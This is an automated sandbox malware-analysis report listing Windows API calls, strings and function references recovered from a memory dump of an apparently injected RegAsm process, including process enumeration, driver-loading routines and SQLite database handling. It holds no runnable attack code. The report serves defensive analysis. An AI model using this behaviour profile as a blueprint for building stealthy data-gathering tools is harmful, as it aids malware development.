                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 4139908857-2887671607
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                      • API String ID: 4019544885-1856150674
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 3897320386-317687271
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
